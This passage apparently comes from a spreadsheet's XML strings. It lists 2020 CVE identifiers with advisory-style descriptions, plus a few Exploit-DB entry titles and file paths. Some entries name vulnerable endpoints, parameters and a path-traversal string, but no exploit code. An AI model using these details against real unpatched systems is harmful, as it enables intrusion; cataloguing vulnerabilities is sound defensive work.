    <t>A vulnerability in the Ethernet packet handling of Cisco Aironet Access Points (APs) Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by connecting as a wired client to the Ethernet interface of an affected device and sending a series of specific packets within a short time frame. A successful exploit could allow the attacker to cause a NULL pointer access that results in a reload of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35521</t>
  </si>
  <si>
    <t>A flaw was found in libtiff. Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to an abort, resulting in denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-35522</t>
  </si>
  <si>
    <t>In LibTIFF, there is a memory malloc failure in tif_pixarlog.c. A crafted TIFF document can lead to an abort, resulting in a remote denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-35523</t>
  </si>
  <si>
    <t>An integer overflow flaw was found in libtiff that exists in the tif_getimage.c file. This flaw allows an attacker to inject and execute arbitrary code when a user opens a crafted TIFF file. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35524</t>
  </si>
  <si>
    <t>A heap-based buffer overflow flaw was found in libtiff in the handling of TIFF images in libtiff's TIFF2PDF tool. A specially crafted TIFF file can lead to arbitrary code execution. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2020-35525</t>
  </si>
  <si>
    <t>In SQlite 3.31.1, a potential null pointer derreference was found in the INTERSEC query processing.</t>
  </si>
  <si>
    <t>CVE-2020-35527</t>
  </si>
  <si>
    <t>In SQLite 3.31.1, there is an out of bounds access problem through ALTER TABLE for views that have a nested FROM clause.</t>
  </si>
  <si>
    <t>CVE-2020-3553</t>
  </si>
  <si>
    <t>CVE-2020-35530</t>
  </si>
  <si>
    <t>In LibRaw, there is an out-of-bounds write vulnerability within the "new_node()" function (libraw\src\x3f\x3f_utils_patched.cpp) that can be triggered via a crafted X3F file.</t>
  </si>
  <si>
    <t>CVE-2020-35531</t>
  </si>
  <si>
    <t>In LibRaw, an out-of-bounds read vulnerability exists within the get_huffman_diff() function (libraw\src\x3f\x3f_utils_patched.cpp) when reading data from an image file.</t>
  </si>
  <si>
    <t>CVE-2020-35532</t>
  </si>
  <si>
    <t>In LibRaw, an out-of-bounds read vulnerability exists within the "simple_decode_row()" function (libraw\src\x3f\x3f_utils_patched.cpp) which can be triggered via an image with a large row_stride field.</t>
  </si>
  <si>
    <t>CVE-2020-35533</t>
  </si>
  <si>
    <t>In LibRaw, an out-of-bounds read vulnerability exists within the "LibRaw::adobe_copy_pixel()" function (libraw\src\decoders\dng.cpp) when reading data from the image file.</t>
  </si>
  <si>
    <t>CVE-2020-35534</t>
  </si>
  <si>
    <t>In LibRaw, there is a memory corruption vulnerability within the "crxFreeSubbandData()" function (libraw\src\decoders\crx.cpp) when processing cr3 files.</t>
  </si>
  <si>
    <t>CVE-2020-35535</t>
  </si>
  <si>
    <t>In LibRaw, there is an out-of-bounds read vulnerability within the "LibRaw::parseSonySRF()" function (libraw\src\metadata\sony.cpp) when processing srf files.</t>
  </si>
  <si>
    <t>CVE-2020-35536</t>
  </si>
  <si>
    <t>In gcc, an internal compiler error in match_reload function at lra-constraints.c may cause a crash through a crafted input file.</t>
  </si>
  <si>
    <t>CVE-2020-35537</t>
  </si>
  <si>
    <t>In gcc, a crafted input source file could cause g++ to crash during compilation when provided certain optimization flags. The problem resides in the ipcp_store_vr_results function in gcc/ipa-cp.c.</t>
  </si>
  <si>
    <t>CVE-2020-35538</t>
  </si>
  <si>
    <t>A crafted input file could cause a null pointer dereference in jcopy_sample_rows() when processed by libjpeg-turbo.</t>
  </si>
  <si>
    <t>CVE-2020-35539</t>
  </si>
  <si>
    <t>A flaw was found in Wordpress 5.1. "X-Forwarded-For" is a HTTP header used to carry the client's original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which decelerate at X-Forwarded-For header instead of original IP, various issues may be faced. If the data originating from these fields is trusted by the application developers and processed, any authorization checks originating IP address logging could be manipulated.</t>
  </si>
  <si>
    <t>CVE-2020-3554</t>
  </si>
  <si>
    <t>A vulnerability in the TCP packet processing of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to a memory exhaustion condition. An attacker could exploit this vulnerability by sending a high rate of crafted TCP traffic through an affected device. A successful exploit could allow the attacker to exhaust device resources, resulting in a DoS condition for traffic transiting the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35542</t>
  </si>
  <si>
    <t>Unisys Data Exchange Management Studio through 5.0.34 doesn't sanitize the input to a HTML document field. This could be used for an XSS attack.</t>
  </si>
  <si>
    <t>CVE-2020-35545</t>
  </si>
  <si>
    <t>Time-based SQL injection exists in Spotweb 1.4.9 via the query string.</t>
  </si>
  <si>
    <t>CVE-2020-35547</t>
  </si>
  <si>
    <t>A library index page in NuPoint Messenger in Mitel MiCollab before 9.2 FP1 could allow an unauthenticated attacker to gain access (view and modify) to user data.</t>
  </si>
  <si>
    <t>CVE-2020-35548</t>
  </si>
  <si>
    <t>An issue was discovered in Finder on Samsung mobile devices with Q(10.0) software. A call to a non-existent provider allows attackers to cause a denial of service. The Samsung ID is SVE-2020-18629 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35549</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) software. Any application may establish itself as the default dialer, without user interaction. The Samsung ID is SVE-2020-19172 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-3555</t>
  </si>
  <si>
    <t>A vulnerability in the SIP inspection process of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a crash and reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to a watchdog timeout and crash during the cleanup of threads that are associated with a SIP connection that is being deleted from the connection list. An attacker could exploit this vulnerability by sending a high rate of crafted SIP traffic through an affected device. A successful exploit could allow the attacker to cause a watchdog timeout and crash, resulting in a crash and reload of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-35550</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), Q(10.0), and R(11.0) software. Attackers can bypass Factory Reset Protection (FRP) via StatusBar. The Samsung ID is SVE-2020-17888 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35551</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (Exynos chipsets) software. They allow attackers to conduct RPMB state-change attacks because an unauthorized RPMB write operation can be replayed, a related issue to CVE-2020-13799. The Samsung ID is SVE-2020-18100 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35552</t>
  </si>
  <si>
    <t>An issue was discovered in the GPS daemon on Samsung mobile devices with O(8.x), P(9.0), and Q(10.0) (non-Qualcomm chipsets) software. Attackers can obtain sensitive location information because the configuration file is incorrect. The Samsung ID is SVE-2020-18678 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35553</t>
  </si>
  <si>
    <t>An issue was discovered on Samsung mobile devices with Q(10.0) and R(11.0) (Qualcomm SM8250 chipsets) software. They allows attackers to cause a denial of service (unlock failure) by triggering a power-shortage incident that causes a false-positive attack detection. The Samsung ID is SVE-2020-19678 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35554</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. There is a WebView SSL error-handler vulnerability. The LG ID is LVE-SMP-200026 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35555</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS 10 software. When a dual-screen configuration is supported, the device does not lock upon disconnection of a call with the cover closed. The LG ID is LVE-SMP-200027 (December 2020).</t>
  </si>
  <si>
    <t>CVE-2020-35556</t>
  </si>
  <si>
    <t>An issue was discovered in Acronis Cyber Protect before 15 Update 1 build 26172. Because the local notification service misconfigures CORS, information disclosure can occur.</t>
  </si>
  <si>
    <t>CVE-2020-35557</t>
  </si>
  <si>
    <t>An issue in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2 allows a logged in user to see devices in the account he should not have access to due to improper use of access validation.</t>
  </si>
  <si>
    <t>CVE-2020-35558</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual through 2.11.2. There is an SSRF in the in the MySQL access check, allowing an attacker to scan for open ports and gain some information about possible credentials.</t>
  </si>
  <si>
    <t>CVE-2020-35559</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an unused function that allows an authenticated attacker to use up all available IPs of an account and thus not allow creation of new devices and users.</t>
  </si>
  <si>
    <t>CVE-2020-3556</t>
  </si>
  <si>
    <t>A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script. The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user. In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run. Cisco has not released software updates that address this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35560</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an unauthenticated open redirect in the redirect.php.</t>
  </si>
  <si>
    <t>CVE-2020-35561</t>
  </si>
  <si>
    <t>An issue was discovered MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. There is an SSRF in the HA module allowing an unauthenticated attacker to scan for open ports.</t>
  </si>
  <si>
    <t>CVE-2020-35563</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an incomplete XSS filter allowing an attacker to inject crafted malicious code into the page.</t>
  </si>
  <si>
    <t>CVE-2020-35564</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an outdated and unused component allowing for malicious user input of active code.</t>
  </si>
  <si>
    <t>CVE-2020-35565</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. The login pages bruteforce detection is disabled by default.</t>
  </si>
  <si>
    <t>CVE-2020-35566</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. An attacker can read arbitrary JSON files via Local File Inclusion.</t>
  </si>
  <si>
    <t>CVE-2020-35567</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. The software uses a secure password for database access, but this password is shared across instances.</t>
  </si>
  <si>
    <t>CVE-2020-35568</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. An incomplete filter applied to a database response allows an authenticated attacker to gain non-public information about other users and devices in the account.</t>
  </si>
  <si>
    <t>CVE-2020-35569</t>
  </si>
  <si>
    <t>An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is a self XSS issue with a crafted cookie in the login page.</t>
  </si>
  <si>
    <t>CVE-2020-3557</t>
  </si>
  <si>
    <t>A vulnerability in the host input API daemon of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted data stream to the host input daemon of the affected device. A successful exploit could allow the attacker to cause the host input daemon to restart. The attacker could use repeated attacks to cause the daemon to continuously reload, creating a DoS condition for the API.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49422.py</t>
  </si>
  <si>
    <t>Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)</t>
  </si>
  <si>
    <t>2021-01-14</t>
  </si>
  <si>
    <t>CVE-2020-35570</t>
  </si>
  <si>
    <t>An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual through 2.11.2. An unauthenticated attacker is able to access files (that should have been restricted) via forceful browsing.</t>
  </si>
  <si>
    <t>CVE-2020-35571</t>
  </si>
  <si>
    <t>An issue was discovered in MantisBT through 2.24.3. In the helper_ensure_confirmed call in manage_custom_field_update.php, the custom field name is not sanitized. This may be problematic depending on CSP settings.</t>
  </si>
  <si>
    <t>CVE-2020-35572</t>
  </si>
  <si>
    <t>Adminer through 4.7.8 allows XSS via the history parameter to the default URI.</t>
  </si>
  <si>
    <t>CVE-2020-35573</t>
  </si>
  <si>
    <t>srs2.c in PostSRSd before 1.10 allows remote attackers to cause a denial of service (CPU consumption) via a long timestamp tag in an SRS address.</t>
  </si>
  <si>
    <t>CVE-2020-35575</t>
  </si>
  <si>
    <t>A password-disclosure issue in the web interface on certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. This affects WA901ND devices before 3.16.9(201211) beta, and Archer C5, Archer C7, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WE843N, WR1043ND, WR1045ND, WR740N, WR741ND, WR749N, WR802N, WR840N, WR841HP, WR841N, WR842N, WR842ND, WR845N, WR940N, WR941HP, WR945N, WR949N, and WRD4300 devices.</t>
  </si>
  <si>
    <t>CVE-2020-35576</t>
  </si>
  <si>
    <t>A Command Injection issue in the traceroute feature on TP-Link TL-WR841N V13 (JP) with firmware versions prior to 201216 allows authenticated users to execute arbitrary code as root via shell metacharacters, a different vulnerability than CVE-2018-12577.</t>
  </si>
  <si>
    <t>CVE-2020-35577</t>
  </si>
  <si>
    <t>In Endalia Selection Portal before 4.205.0, an Insecure Direct Object Reference (IDOR) allows any authenticated user to download every file uploaded to the platform by changing the value of the file identifier (aka CommonDownload identification number).</t>
  </si>
  <si>
    <t>CVE-2020-35578</t>
  </si>
  <si>
    <t>An issue was discovered in the Manage Plugins page in Nagios XI before 5.8.0. Because the line-ending conversion feature is mishandled during a plugin upload, a remote, authenticated admin user can execute operating-system commands.</t>
  </si>
  <si>
    <t>CVE-2020-35579</t>
  </si>
  <si>
    <t>tindy2013 subconverter 0.6.4 has a /sub?target=%TARGET%&amp;url=%URL%&amp;config=%CONFIG% API endpoint that accepts an arbitrary %URL% value and launches a GET request for it, but does not consider that the external request target may indirectly redirect back to this original /sub endpoint. Thus, a request loop and a denial of service may occur.</t>
  </si>
  <si>
    <t>CVE-2020-3558</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. The vulnerability is due to improper input validation of the parameters of an HTTP request. An attacker could exploit this vulnerability by intercepting an HTTP request from a user. A successful exploit could allow the attacker to modify the HTTP request to cause the interface to redirect the user to a specific, malicious URL. This type of vulnerability is known as an open redirect attack and is used in phishing attacks that get users to unknowingly visit malicious sites.</t>
  </si>
  <si>
    <t>CVE-2020-35580</t>
  </si>
  <si>
    <t>A local file inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin's API key and the base64 encoded SHA1 password hashes of other SearchBlox users.</t>
  </si>
  <si>
    <t>CVE-2020-35581</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) issue in Envira Gallery Lite before 1.8.3.3 allows remote attackers to inject arbitrary JavaScript/HTML code via a POST /wp-admin/admin-ajax.php request with the meta[title] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35582</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) issue in Envira Gallery Lite before 1.8.3.3 allows remote attackers to inject arbitrary JavaScript/HTML code via a POST /wp-admin/post.php request with the post_title parameter.</t>
  </si>
  <si>
    <t>CVE-2020-35584</t>
  </si>
  <si>
    <t>In Solstice Pod before 3.0.3, the web services allow users to connect to them over unencrypted channels via the Browser Look-in feature. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the web services and obtain any information the user supplies, including Administrator passwords and screen keys.</t>
  </si>
  <si>
    <t>CVE-2020-35585</t>
  </si>
  <si>
    <t>In Solstice Pod before 3.3.0 (or Open4.3), the screen key can be enumerated using brute-force attacks via the /lookin/info Solstice Open Control API because there are only 1.7 million possibilities.</t>
  </si>
  <si>
    <t>CVE-2020-35586</t>
  </si>
  <si>
    <t>In Solstice Pod before 3.3.0 (or Open4.3), the Administrator password can be enumerated using brute-force attacks via the /Config/service/initModel?password= Solstice Open Control API because there is no complexity requirement (e.g., it might be all digits or all lowercase letters).</t>
  </si>
  <si>
    <t>CVE-2020-35587</t>
  </si>
  <si>
    <t>** DISPUTED ** In Solstice Pod before 3.0.3, the firmware can easily be decompiled/disassembled. The decompiled/disassembled files contain non-obfuscated code. NOTE: it is unclear whether lack of obfuscation is directly associated with a negative impact, or instead only facilitates an attack technique.</t>
  </si>
  <si>
    <t>CVE-2020-35589</t>
  </si>
  <si>
    <t>The limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows wp-admin/options-general.php?page=limit-login-attempts&amp;tab= XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims.</t>
  </si>
  <si>
    <t>CVE-2020-3559</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Aironet Access Point (AP) Software could allow an unauthenticated, remote attacker to cause an affected device to reload. The vulnerability is due to improper handling of clients that are trying to connect to the AP. An attacker could exploit this vulnerability by sending authentication requests from multiple clients to an affected device. A successful exploit could allow the attacker to cause the affected device to reload.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49343.txt</t>
  </si>
  <si>
    <t>Advanced Comment System 1.0 - 'ACS_path' Path Traversal</t>
  </si>
  <si>
    <t>CVE-2020-35590</t>
  </si>
  <si>
    <t>LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries.</t>
  </si>
  <si>
    <t>CVE-2020-35591</t>
  </si>
  <si>
    <t>Pi-hole 5.0, 5.1, and 5.1.1 allows Session Fixation. The application does not generate a new session cookie after the user is logged in. A malicious user is able to create a new session cookie value and inject it to a victim. After the victim logs in, the injected cookie becomes valid, giving the attacker access to the user's account through the active session.</t>
  </si>
  <si>
    <t>CVE-2020-35592</t>
  </si>
  <si>
    <t>Pi-hole 5.0, 5.1, and 5.1.1 allows XSS via the Options header to the admin/ URI. A remote user is able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and achieve a Reflected Cross-Site Scripting attack against other users and steal the session cookie.</t>
  </si>
  <si>
    <t>CVE-2020-35594</t>
  </si>
  <si>
    <t>Zoho ManageEngine ADManager Plus before 7066 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-35597</t>
  </si>
  <si>
    <t>Victor CMS 1.0 is vulnerable to SQL injection via c_id parameter of admin_edit_comment.php, p_id parameter of admin_edit_post.php, u_id parameter of admin_edit_user.php, and edit parameter of admin_update_categories.php.</t>
  </si>
  <si>
    <t>CVE-2020-35598</t>
  </si>
  <si>
    <t>ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. NOTE: this might be the same as CVE-2009-4623</t>
  </si>
  <si>
    <t>CVE-2020-3560</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Aironet Access Points (APs) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) on an affected device. The vulnerability is due to improper resource management while processing specific packets. An attacker could exploit this vulnerability by sending a series of crafted UDP packets to a specific port on an affected device. A successful exploit could either allow the attacker to tear down the connection between the AP and the wireless LAN controller, resulting in the affected device not being able to process client traffic, or cause the vulnerable device to reload, triggering a DoS condition. After the attack, the affected device should automatically recover its normal functions without manual intervention.</t>
  </si>
  <si>
    <t>exploits/linux/webapps/49318.rb</t>
  </si>
  <si>
    <t>Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)</t>
  </si>
  <si>
    <t>2020-12-22</t>
  </si>
  <si>
    <t>CVE-2020-35604</t>
  </si>
  <si>
    <t>An XXE attack can occur in Kronos WebTA 5.0.4 when SAML is used.</t>
  </si>
  <si>
    <t>CVE-2020-35605</t>
  </si>
  <si>
    <t>The Graphics Protocol feature in graphics.c in kitty before 0.19.3 allows remote attackers to execute arbitrary code because a filename containing special characters can be included in an error message.</t>
  </si>
  <si>
    <t>CVE-2020-35606</t>
  </si>
  <si>
    <t>Arbitrary command execution can occur in Webmin through 1.962. Any user authorized for the Package Updates module can execute arbitrary commands with root privileges via vectors involving %0A and %0C. NOTE: this issue exists because of an incomplete fix for CVE-2019-12840.</t>
  </si>
  <si>
    <t>CVE-2020-35608</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the normal world’s signed code execution functionality of Microsoft Azure Sphere 20.07. A specially crafted AF_PACKET socket can cause a process to create an executable memory mapping with controllable content. An attacker can execute a shellcode that uses the PACKET_MMAP functionality to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35609</t>
  </si>
  <si>
    <t>A denial-of-service vulnerability exists in the asynchronous ioctl functionality of Microsoft Azure Sphere 20.05. A sequence of specially crafted ioctl calls can cause a denial of service. An attacker can write shellcode to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3561</t>
  </si>
  <si>
    <t>A vulnerability in the Clientless SSL VPN (WebVPN) of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to inject arbitrary HTTP headers in the responses of the affected system. The vulnerability is due to improper input sanitization. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to conduct a CRLF injection attack, adding arbitrary HTTP headers in the responses of the system and redirecting the user to arbitrary websites.</t>
  </si>
  <si>
    <t>CVE-2020-35610</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 2.5.0 through 3.9.22. The autosuggestion feature of com_finder did not respect the access level of the corresponding terms.</t>
  </si>
  <si>
    <t>CVE-2020-35611</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 2.5.0 through 3.9.22. The globlal configuration page does not remove secrets from the HTML output, disclosing the current values.</t>
  </si>
  <si>
    <t>CVE-2020-35612</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 2.5.0 through 3.9.22. The folder parameter of mod_random_image lacked input validation, leading to a path traversal vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35613</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 3.0.0 through 3.9.22. Improper filter blacklist configuration leads to a SQL injection vulnerability in the backend user list.</t>
  </si>
  <si>
    <t>CVE-2020-35614</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 3.9.0 through 3.9.22. Improper handling of the username leads to a user enumeration attack vector in the backend login page.</t>
  </si>
  <si>
    <t>CVE-2020-35615</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 2.5.0 through 3.9.22. A missing token check in the emailexport feature of com_privacy causes a CSRF vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35616</t>
  </si>
  <si>
    <t>An issue was discovered in Joomla! 1.7.0 through 3.9.22. Lack of input validation while handling ACL rulesets can cause write ACL violations.</t>
  </si>
  <si>
    <t>CVE-2020-3562</t>
  </si>
  <si>
    <t>A vulnerability in the SSL/TLS inspection of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series firewalls could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation for certain fields of specific SSL/TLS messages. An attacker could exploit this vulnerability by sending a malformed SSL/TLS message through an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. No manual intervention is needed to recover the device after it has reloaded.</t>
  </si>
  <si>
    <t>CVE-2020-35622</t>
  </si>
  <si>
    <t>An issue was discovered in the GlobalUsage extension for MediaWiki through 1.35.1. SpecialGlobalUsage.php calls WikiMap::makeForeignLink unsafely. The $page variable within the formatItem function was not being properly escaped, allowing for XSS under certain conditions.</t>
  </si>
  <si>
    <t>CVE-2020-35623</t>
  </si>
  <si>
    <t>An issue was discovered in the CasAuth extension for MediaWiki through 1.35.1. Due to improper username validation, it allowed user impersonation with trivial manipulations of certain characters within a given username. An ordinary user may be able to login as a "bureaucrat user" who has a similar username, as demonstrated by usernames that differ only in (1) bidirectional override symbols or (2) blank space.</t>
  </si>
  <si>
    <t>CVE-2020-35624</t>
  </si>
  <si>
    <t>An issue was discovered in the SecurePoll extension for MediaWiki through 1.35.1. The non-admin vote list contains a full vote timestamp, which may provide unintended clues about how a voting process unfolded.</t>
  </si>
  <si>
    <t>CVE-2020-35625</t>
  </si>
  <si>
    <t>An issue was discovered in the Widgets extension for MediaWiki through 1.35.1. Any user with the ability to edit pages within the Widgets namespace could call any static function within any class (defined within PHP or MediaWiki) via a crafted HTML comment, related to a Smarty template. For example, a person in the Widget Editors group could use \MediaWiki\Shell\Shell::command within a comment.</t>
  </si>
  <si>
    <t>CVE-2020-35626</t>
  </si>
  <si>
    <t>An issue was discovered in the PushToWatch extension for MediaWiki through 1.35.1. The primary form did not implement an anti-CSRF token and therefore was completely vulnerable to CSRF attacks against onSkinAddFooterLinks in PushToWatch.php.</t>
  </si>
  <si>
    <t>CVE-2020-35627</t>
  </si>
  <si>
    <t>Ultimate WooCommerce Gift Cards 3.0.2 is affected by a file upload vulnerability in the Custom GiftCard Template that can remotely execute arbitrary code. Once it contains the function "Custom Gift Card Template", the function of uploading a custom image is used, changing the name of the image extension to PHP and executing PHP code on the server.</t>
  </si>
  <si>
    <t>CVE-2020-35628</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. An oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sloop() slh-&gt;incident_sface. An attacker can provide malicious input to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35629</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sloop() slh-&gt;facet().</t>
  </si>
  <si>
    <t>CVE-2020-3563</t>
  </si>
  <si>
    <t>A vulnerability in the packet processing functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to inefficient memory management. An attacker could exploit this vulnerability by sending a large number of TCP packets to a specific port on an affected device. A successful exploit could allow the attacker to exhaust system memory, which could cause the device to reload unexpectedly. No manual intervention is needed to recover the device after it has reloaded.</t>
  </si>
  <si>
    <t>CVE-2020-35630</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sface() sfh-&gt;center_vertex().</t>
  </si>
  <si>
    <t>CVE-2020-35631</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sface() SD.link_as_face_cycle().</t>
  </si>
  <si>
    <t>CVE-2020-35632</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sface() sfh-&gt;boundary_entry_objects Edge_of.</t>
  </si>
  <si>
    <t>CVE-2020-35633</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. An oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser&lt;EW&gt;::read_sface() store_sm_boundary_item() Edge_of.A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35634</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1. An oob read vulnerability exists in Nef_S2/SNC_io_parser.h SNC_io_parser&lt;EW&gt;::read_sface() sfh-&gt;boundary_entry_objects Sloop_of. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35635</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1 in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() store_sm_boundary_item() Sloop_of OOB read. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-35636</t>
  </si>
  <si>
    <t>A code execution vulnerability exists in the Nef polygon-parsing functionality of CGAL libcgal CGAL-5.1.1 in Nef_S2/SNC_io_parser.h SNC_io_parser::read_sface() sfh-&gt;volume() OOB read. A specially crafted malformed file can lead to an out-of-bounds read and type confusion, which could lead to code execution. An attacker can provide malicious input to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-3564</t>
  </si>
  <si>
